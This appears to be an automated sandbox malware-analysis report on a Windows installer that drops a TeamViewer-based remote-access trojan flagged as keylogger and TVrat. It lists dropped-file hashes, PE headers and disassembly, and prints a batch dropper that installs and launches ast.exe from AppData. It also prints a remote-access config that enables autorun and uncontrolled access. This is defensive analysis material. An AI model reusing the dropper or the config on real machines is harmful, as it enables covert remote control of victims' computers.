                                                                                                                                          SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                                          SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                                          SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):370488
                                                                                                                                          Entropy (8bit):6.86993159214619
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:wJ9LiOhPhz85popbbFb06wAQAwq961b/v9MkvCq2/JO+UxK6DvX0C7Uxm//f0Ps7:IBi8q5po9JkyICq2/z6DvsyEE5+PgAEX
                                                                                                                                          MD5:82E49683F540F78B2D1759CDE594482F
                                                                                                                                          SHA1:352DCBDBBB3C5C927B83389E2AB7F40B66EE716A
                                                                                                                                          SHA-256:55D99ECD7F821A4B2FE7E5A0B2CEA213DC79004C1DC413BD003F032C61080576
                                                                                                                                          SHA-512:F50A3BCD5905103EEC344D7DAF1C17896DF9039D3E8D5E9BBD771F1E235EC6045D626ED838C9BF3A8F7A66AA5F41F0743EA7D9BDEF7492DA8B36561089E126BF
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1073767936
                                                                                                                                          Entropy (8bit):4.300012443222872E-4
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:
                                                                                                                                          MD5:C8AD6A4A50181E2DD95951BE4C2C54E1
                                                                                                                                          SHA1:8B7375158EE606D455295D0A34901BC05DEE0665
                                                                                                                                          SHA-256:DF6843408E914A00A2A4BF93068031E77023089E38031A3E5E99B0F420686ECA
                                                                                                                                          SHA-512:59CA02AD50E7D5FBD2DEE8295584AB643F8716ADE58352583A60EBA641012EA814D60247452D423CDB9FA05C5A79903184FFECFE615AE37DD2ACF8722E3E0952
                                                                                                                                          Malicious:true
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):33
                                                                                                                                          Entropy (8bit):4.9837880587523955
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:SqUEDm:Sqnm
                                                                                                                                          MD5:71B4245ABD801E82ECC8CB1571F8F52E
                                                                                                                                          SHA1:CD8ADA2E8089936C031937232E09E385FB402DDC
                                                                                                                                          SHA-256:4BE589771AC3BE4AE5B94590AFC39AEA664FBF400C651FBD268B48436FA509A7
                                                                                                                                          SHA-512:6897B6B819850489BF9732C46EDAFBDC8E439F3482E120A693D79FDBCB5F2E6947E7E2065D9A684F0A7CEF1B25E0938476D9F819F9F661A0D7AD2A7D0E8789D9
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:..8..DXP+...1.GBY.*..E.JQB......
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):465
                                                                                                                                          Entropy (8bit):4.684149132947556
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:hmR9oa39T4h+dspB929c2dceR0n1tcA2dcvNiccA2dx0HcA2d7DvDTfcA2djLvBN:w753d48daBVn17jfxmfJ8FQwH
                                                                                                                                          MD5:83B5833A435D05A04AC59744600DE4B7
                                                                                                                                          SHA1:ABE722BCC9DA288E76931962EF225EEB10BA1534
                                                                                                                                          SHA-256:B70F9730CC0796164698E9311AFBBDB95566149A7B542FE8E449F928DA239154
                                                                                                                                          SHA-512:FFA3A85AC112A622B5DC322CFF24197903B8D31D6ECAC265E02C92784693B3DFB76773545C5AB5C77FD64BF1482BEB9BC89D11392FADA662E09C0EF4099EAD8E
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:@echo off..set "StartDirName=template" ..set "TempDirName=u7i3kw" ..set "BatchName=9vsl3c.bat" ..set "ProcName=ast.exe" ....if exist "%appdata%\StartDirName" (..goto end..) else (..mkdir "%appdata%\%StartDirName%"..xcopy /Y /I /S "%~dp0*" "%appdata%\%StartDirName%\"..del /f /q "%appdata%\%StartDirName%\%BatchName%"..start "" "%appdata%\%StartDirName%\%ProcName%"..)..:end..for /d %%i in (%temp%\%TempDirName%) do rd /s /q %%i..
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):172216
                                                                                                                                          Entropy (8bit):6.698242571688099
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:nGhQI/PxvCWRDvcDfo0F5HekeyO54ECV0/sMHL0WPCCb5rAg0Fujx8E0/3xt9qKv:kPxqWYF5HkyDLMsOzrAOL23VqK28j
                                                                                                                                          MD5:CF1169A87FE6266C7B457A2424DA69DA
                                                                                                                                          SHA1:5ADD67DEFD4CA56C1E9C0B239899EA699B140B64
                                                                                                                                          SHA-256:24E01FD95225E260CDD41015A70374A048568D4DF6681B3D44EAABCB1EA03EAF
                                                                                                                                          SHA-512:7BF76EB5B4E31A65931AF730909FBF848334BC98DA279E291E186FCAFDC81C76D1EF0EFEC4E00B8EAEDE6F8D130DA8B6B3D3C5DD8C14C6DCD3BCDC7D050A4B66
                                                                                                                                          Malicious:true
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):7543992
                                                                                                                                          Entropy (8bit):6.717610928993395
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:98304:q0f/bCIDcCkgVmZqIXrdoXj++CEKDFBaVOGizeKFUtqiAp+hRWmMLlJ7p1:X/bCIPkgVpycKDFqOLNUtqiAz
                                                                                                                                          MD5:8002D9E5851728EB024B398CF19DE390
                                                                                                                                          SHA1:9A1DC7134F3F6FCCB37DFC4DDDA35DFA2875095E
                                                                                                                                          SHA-256:B8DDE42C70D8C4A3511D5EDFFBC9F7F0C03DBDA980E29693E71344F76DA6BB0F
                                                                                                                                          SHA-512:6936B6B01F9FC2F2F69DE6AE468A9F7173239BD003AD8B7BC7336C4DD4DB50457E20EC6783B2E8A166D684A56F3F1E9FB701CA903DF3F74E3CA25C46B8A8D00E
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\template\ast.exe, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\template\ast.exe, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TVrat, Description: Yara detected TVrat, Source: C:\Users\user\AppData\Roaming\template\ast.exe, Author: Joe Security
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):581304
                                                                                                                                          Entropy (8bit):6.580382227041057
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:bj4Q3+oAscridrDg76u3HsBTc9GtIGPi2Emvh5/kJSMl0yomcY/nRwl2Sp:bHYXSTMGtNPitm1yomJ/n+tp
                                                                                                                                          MD5:CDC5A8221738C1CA66564755BB58138C
                                                                                                                                          SHA1:EF096A2CAF133D217C202C147855F2CEE7ECD105
                                                                                                                                          SHA-256:DF5CEF85E92C6FFFAAC0ACDCE645AED3C5FA1F8FE7F9700D84CA08468AD3D5E3
                                                                                                                                          SHA-512:A9F3E256518771C1C97374E7AE3EE19EBEC0D794CD740E059DBC8289356CF1FB5D4A19F2677DB2ADBB179A73520AAEC67947DCF4C8BCD930206DE4B6CDCAD4C6
                                                                                                                                          Malicious:true
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1724088
                                                                                                                                          Entropy (8bit):6.573221633911959
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSvSSSSSSSSSSSSSSSlwwwwwwwwwwwwwwI:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSO
                                                                                                                                          MD5:E0E559010A1CC7CB6B6F754E8833A156
                                                                                                                                          SHA1:0ADB286A1511B9D5820B042EE7D059DAEE8D0978
                                                                                                                                          SHA-256:A49D90D39BCF0FB183A8E2DFDA90E1B745565DDC25C0CC92ED7068868CB8F3E4
                                                                                                                                          SHA-512:3225A22CA8044FAFE03C005C55924B71EC2D3C9EE2325B45703EADC1F912DD867DD7FADCA0652FA2ACD46D4067575377388134E3CC58B13C0F82540224E98221
                                                                                                                                          Malicious:true
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):17648
                                                                                                                                          Entropy (8bit):6.317642988990049
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:ZPkFNiOMTd1th9gQIim+4vBDVU376TFNiWC:iNhMpXgIr4vBBYANi1
                                                                                                                                          MD5:ACF7048E2347CFD66CD17648DBFBAF45
                                                                                                                                          SHA1:DF5A12E399176771DC8CF2F7D0CF5548E41E2BB3
                                                                                                                                          SHA-256:F1CFFBC2ADA8491755C76360AAD14314DEB576AA65F503E52FA24DEE7D33D8E7
                                                                                                                                          SHA-512:51A53CB700FBB7ABF3BDA3101ED0885572460C1686D07C3D2125C8AA6F0834E30528BEE78CC40EE9270714A16AC769D16F5A916F37F0E48BBF7121202E58E0C0
                                                                                                                                          Malicious:true
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):586
                                                                                                                                          Entropy (8bit):5.203397968860563
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:L1YWzRcSbZKsNlTQ/dw/7y/x5/D++472p+fso+9hffAaJYQMhsK/qI8qP:Z7zRcSbZKKlcMypJD5KxkiaJosBq
                                                                                                                                          MD5:5D7974984AE3D593B7887CC7BDA866DD
                                                                                                                                          SHA1:9C0B2EC2659812F1E46F2D32F82E61DF223C674C
                                                                                                                                          SHA-256:7888BDB632F1BC5EB6DAE5624FE9065868D279E50ACC569D3DDE0F6DB1C95051
                                                                                                                                          SHA-512:7BDACFBCE85726A683C3A316F578A88D5991E37C8FB1E13FC4715141F5752E7FD5D145AC36730B637E26FD3198EDE2D27E86F5CF7283A0C9B08579B1056B0B70
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:[config]..Security.FixPass=4297F44B13955235245B2497399D7A93..Main.Autorun=1..Main.CloseButtonOperation=0..Main.CheckUpdates=0..Security.UseLocalSecuritySettings=1..Security.DynPassKind=0..Security.PassLifetime=0..Security.CanWinAuth=1..Security.AccessKind=1..Security.CanWinLoginAnotherUser=1..Security.UNCONTROLLED_ACCESS=1..Security.CanWinLoginNotAdmin=1..Security.DenyRemoteSettingsControl=0..Security.DenyLockControls=0..Log.ServerStoreTechLog=0..Main.AWAYMODE_REQUIRED=1..Main.LogsLifetime=1..Main.LogsForMail2Support=1..ProxySettings.UseKind=1..ProxySettings.StoreUserAndPassw=1..
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x272, components 3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):5802
                                                                                                                                          Entropy (8bit):7.930078612894882
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:WnjHA1+9wxNAwaf886RfeyZH+5sJCf9ZN2Lzr7wnJIbp8Gj7S2ZchDqDdZyt7JlK:yVMQM1TeSJCf9Kr7wnJIbGGjtA+KJlOH
                                                                                                                                          MD5:AD245BDEA321CE2B299310DE0B7140A3
                                                                                                                                          SHA1:B98EE537F4BAA319F74BEC31D00A8F0B9621854C
                                                                                                                                          SHA-256:D2A83207A65620B133BABAE9D8E4595EB5556F4FC063CF41A552D664E0865C4B
                                                                                                                                          SHA-512:1F4D9994397D10EF3879ED5F7C1F85129E2644E0C6B243E920ED5C4623082865911B1255A577BFFAF035EB6F3E41DE6E4CD7B7D354C64F097891B965C18CBD11
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2236144
                                                                                                                                          Entropy (8bit):5.624149670958732
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:2HGHuX4EewGQcPryfFMoxJ+4PulW/ChEIgTS/zRUm:2HGOX4CGQtMs+WuVge/em
                                                                                                                                          MD5:BCCF6A5C2595EEA84533692BB788D8BB
                                                                                                                                          SHA1:24318226F145E52B7633A4E9E844D6EAD43B75AC
                                                                                                                                          SHA-256:ABF75DE674428E112F90F1C618218FF73EF851F4F09C5F5BA8B69E79A6C74DBF
                                                                                                                                          SHA-512:78F24F0812AAE31E83340ADEB1A1AE8C00EDFDF483E299706F863CB713BFDC2501B5418CE8F8BD9131E3C704BFFB58A8CA05C5E0A75EB19F15E0409C5B74E35B
                                                                                                                                          Malicious:true
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2533560
                                                                                                                                          Entropy (8bit):6.236092740507617
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:y+PXMbxU8+hh5Mitv70n8yT1CPwDv3uFfJEkyD9:y+PwEMit0n8A1CPwDv3uFfJC
                                                                                                                                          MD5:59A3B581020759D52538425A1F5A53D5
                                                                                                                                          SHA1:4E7C528EFEF2C42119C80EFE0AA994B7AA6D2AB6
                                                                                                                                          SHA-256:4C94F00150231420A0526E9949AC9F339EB04B16BC18CB8A11C7FD98DB1235D6
                                                                                                                                          SHA-512:9D30D8167E787FD4A82444BAAA3703920EC41CBE9C684010B63564DE04E00D590C8081006C68627B8297D2715194D4B80C23B959E554D42B2770664D1ED1B79E
                                                                                                                                          Malicious:true
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2098416
                                                                                                                                          Entropy (8bit):6.277915381502377
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:Vkv4EyvQ/qpyr0kAYdQqqW6qvHewDe01CPwDv3uFR0b5YrpsJ:VkvXyvQ/qpyr0kAd66oewv1CPwDv3uFI
                                                                                                                                          MD5:1AFC9BD5E625E85B696141F62FBA4325
                                                                                                                                          SHA1:56FB325125F436D7408808446D58AF50F8AA3BFC
                                                                                                                                          SHA-256:83A1E3CBE242B978B9F55273B7B2648D0492B741FF561C0EC1C6AD9A4AEDAB47
                                                                                                                                          SHA-512:02C2CF9DBC319C2AAF324175CFD3E435824439F33B4CA697324F1B8FF4331D7BDE80DE46909FC629193EF02DEB40853E295B35DC2E3B094D116B5DD783919213
                                                                                                                                          Malicious:true
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):546816
                                                                                                                                          Entropy (8bit):6.657309146326691
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:DEnhioDz6zv6pmEmE5A8K8ZOO2rKQrbdCPAEI:Dmbz+vomEBHbZO2YCBI
                                                                                                                                          MD5:13CD45DF8AAA584EBD2A40EDE76F1E06
                                                                                                                                          SHA1:BAA19E6A965621CB315E5F866EDC179EF1D6B863
                                                                                                                                          SHA-256:3FF4E80E327F298A11E116A517BE0963A0B3CD376A6A624CAFFACD586E6B1449
                                                                                                                                          SHA-512:285D7265AC05CECDD43650E5DEF9198B5F2F4D63665739BAA059598E41F4CE892248D3CA7E793AC274DC05B4C19CFA11C17FAEA62FC1E3495C94A03851049328
                                                                                                                                          Malicious:true
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1388688
                                                                                                                                          Entropy (8bit):6.85745413435775
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:vNaU+KpPikndiNfzN4jH3PlMQzMjYpOtJqTp/kqg1+:xlUfzN4jH3PlyjYpOLqd/kP1+
                                                                                                                                          MD5:3B838DC25E96877A1852966F75A5C44A
                                                                                                                                          SHA1:555E1830829B008D66FF591D87AC235F6286AB9A
                                                                                                                                          SHA-256:292C9367E5F978D2085192B85BCFEA7DF3A033172703BCCF1FF28A74D65D5AC1
                                                                                                                                          SHA-512:B5A7F05CD721FC75B77BB33528F746E865C2277A32F3AA312A974DE903A817B7C83E7698980A496B5D04595B21926E94CF9F70A15CD0882D57BA25014BA775D6
                                                                                                                                          Malicious:true
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):713456
                                                                                                                                          Entropy (8bit):6.620067101616198
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:RPCS0cSUktNimb/JZqNFcbJ3bZJNlvI8CjBMUC6eVc4/SK:RPCS0c1ktNimbqYZJNlvVc4L
                                                                                                                                          MD5:96D413CAAF8C7793A96EF200F6695922
                                                                                                                                          SHA1:ABFB19A5BEA8724A08A3C709B68C65178E8EFBE5
                                                                                                                                          SHA-256:5C6E5346C4EF80E1DD211BD5519311ACA01025CE1D3811113A03E657938F370D
                                                                                                                                          SHA-512:93BF7AC89AE64948C3E91294DE89478B0F92D9CEFB71C803ABB324E181D783801C87DD6D806B0DB0D3737B3330E37993AE07B9B7D5AACCA9F9F5C3556E23EEE4
                                                                                                                                          Malicious:true
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):541880
                                                                                                                                          Entropy (8bit):5.766958615909
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:ghUZvMdmP9OwMJvP2jkIgEIdwKADpiw7FCPU2lvzTNl:BhMsPG2udwLdigFyU2lvzTNl
                                                                                                                                          MD5:753B75570811052953F336261E3031BB
                                                                                                                                          SHA1:2244CCE49368180C1CF6BCA0C57DAEC71401C4F7
                                                                                                                                          SHA-256:603C5FD4E29C14DF02937DF765BF76E067A7A4706130D93F947106D0AE09A9DE
                                                                                                                                          SHA-512:6C81B813A79077E7157CF7F647A1F3C31A71098037C7003BC40B70E4AADAFCF490FDC01C71A26F8FED8C97BA33B41DF5B8A0D479DA951459CBD56421705813C5
                                                                                                                                          Malicious:true
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):970912
                                                                                                                                          Entropy (8bit):6.9649735952029515
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                                          MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                                          SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                                          SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                                          SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):370488
                                                                                                                                          Entropy (8bit):6.86993159214619
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:wJ9LiOhPhz85popbbFb06wAQAwq961b/v9MkvCq2/JO+UxK6DvX0C7Uxm//f0Ps7:IBi8q5po9JkyICq2/z6DvsyEE5+PgAEX
                                                                                                                                          MD5:82E49683F540F78B2D1759CDE594482F
                                                                                                                                          SHA1:352DCBDBBB3C5C927B83389E2AB7F40B66EE716A
                                                                                                                                          SHA-256:55D99ECD7F821A4B2FE7E5A0B2CEA213DC79004C1DC413BD003F032C61080576
                                                                                                                                          SHA-512:F50A3BCD5905103EEC344D7DAF1C17896DF9039D3E8D5E9BBD771F1E235EC6045D626ED838C9BF3A8F7A66AA5F41F0743EA7D9BDEF7492DA8B36561089E126BF
                                                                                                                                          Malicious:true
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1073767936
                                                                                                                                          Entropy (8bit):4.300012443222872E-4
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:
                                                                                                                                          MD5:C8AD6A4A50181E2DD95951BE4C2C54E1
                                                                                                                                          SHA1:8B7375158EE606D455295D0A34901BC05DEE0665
                                                                                                                                          SHA-256:DF6843408E914A00A2A4BF93068031E77023089E38031A3E5E99B0F420686ECA
                                                                                                                                          SHA-512:59CA02AD50E7D5FBD2DEE8295584AB643F8716ADE58352583A60EBA641012EA814D60247452D423CDB9FA05C5A79903184FFECFE615AE37DD2ACF8722E3E0952
                                                                                                                                          Malicious:true
                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Entropy (8bit):7.970819679785949
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                                                                                          • Inno Setup installer (109748/4) 1.08%
                                                                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                          File name:aeyh21MAtA.exe
                                                                                                                                          File size:7'234'714 bytes
                                                                                                                                          MD5:91444fbf43fbbb75b12dc51f3b5465ea
                                                                                                                                          SHA1:1c81094998d5afa6c09ebd3ee14c4d99b56d729f
                                                                                                                                          SHA256:21bc348816742321a937e95b1a4b6a57d285c143cc920a2e95c236467123e56f
                                                                                                                                          SHA512:4a1bedcaf4f80065dbb89125a245897a32db7bc00a0145dcf23881c90952afc5f86bb280ddda627de9518912492d7b92785fac1660ae30d826f950e4825d4a58
                                                                                                                                          SSDEEP:196608:y04d2RBrM9w5oM+HfNmaHoipZIH0nrgZAk3Cc/8JY1:l4yu9wpifNm+oc9r413B/QM
                                                                                                                                          TLSH:7A7623C2A186C5B5E86A0431D9364CF42E522C6DD4E5192B1DBCFE1C7AB73C204BBE5B
                                                                                                                                          Icon Hash:81654d9181010156
                                                                                                                                          Entrypoint:0x416478
                                                                                                                                          Entrypoint Section:.itext
                                                                                                                                          Digitally signed:false
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                          Time Stamp:0x506A75C4 [Tue Oct 2 05:04:04 2012 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:5
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:5
                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:5
                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                          Import Hash:483f0c4259a9148c34961abbda6146c1
                                                                                                                                          Instruction
                                                                                                                                          push ebp
                                                                                                                                          mov ebp, esp
                                                                                                                                          add esp, FFFFFFA4h
                                                                                                                                          push ebx
                                                                                                                                          push esi
                                                                                                                                          push edi
                                                                                                                                          xor eax, eax
                                                                                                                                          mov dword ptr [ebp-3Ch], eax
                                                                                                                                          mov dword ptr [ebp-40h], eax
                                                                                                                                          mov dword ptr [ebp-5Ch], eax
                                                                                                                                          mov dword ptr [ebp-30h], eax
                                                                                                                                          mov dword ptr [ebp-38h], eax
                                                                                                                                          mov dword ptr [ebp-34h], eax
                                                                                                                                          mov dword ptr [ebp-2Ch], eax
                                                                                                                                          mov dword ptr [ebp-28h], eax
                                                                                                                                          mov dword ptr [ebp-14h], eax
                                                                                                                                          mov eax, 004152B8h
                                                                                                                                          call 00007F824CE4AF01h
                                                                                                                                          xor eax, eax
                                                                                                                                          push ebp
                                                                                                                                          push 00416B45h
                                                                                                                                          push dword ptr fs:[eax]
                                                                                                                                          mov dword ptr fs:[eax], esp
                                                                                                                                          xor edx, edx
                                                                                                                                          push ebp
                                                                                                                                          push 00416B01h
                                                                                                                                          push dword ptr fs:[edx]
                                                                                                                                          mov dword ptr fs:[edx], esp
                                                                                                                                          mov eax, dword ptr [0041AB48h]
                                                                                                                                          call 00007F824CE597ABh
                                                                                                                                          call 00007F824CE59352h
                                                                                                                                          lea edx, dword ptr [ebp-14h]
                                                                                                                                          xor eax, eax
                                                                                                                                          call 00007F824CE52FD4h
                                                                                                                                          mov edx, dword ptr [ebp-14h]
                                                                                                                                          mov eax, 0041D6ECh
                                                                                                                                          call 00007F824CE49537h
                                                                                                                                          push 00000002h
                                                                                                                                          push 00000000h
                                                                                                                                          push 00000001h
                                                                                                                                          mov ecx, dword ptr [0041D6ECh]
                                                                                                                                          mov dl, 01h
                                                                                                                                          mov eax, dword ptr [0040F080h]
                                                                                                                                          call 00007F824CE538BFh
                                                                                                                                          mov dword ptr [0041D6F0h], eax
                                                                                                                                          xor edx, edx
                                                                                                                                          push ebp
                                                                                                                                          push 00416AADh
                                                                                                                                          push dword ptr fs:[edx]
                                                                                                                                          mov dword ptr fs:[edx], esp
                                                                                                                                          call 00007F824CE59833h
                                                                                                                                          mov dword ptr [0041D6F8h], eax
                                                                                                                                          mov eax, dword ptr [0041D6F8h]
                                                                                                                                          cmp dword ptr [eax+0Ch], 01h
                                                                                                                                          jne 00007F824CE5AB9Ah
                                                                                                                                          mov eax, dword ptr [0041D6F8h]
                                                                                                                                          mov edx, 00000028h
                                                                                                                                          call 00007F824CE53D88h
                                                                                                                                          mov edx, dword ptr [0041D6F8h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1e000 | 0xf9e | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x21000 | 0x4b7e4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x20000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1e350 | 0x24c | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
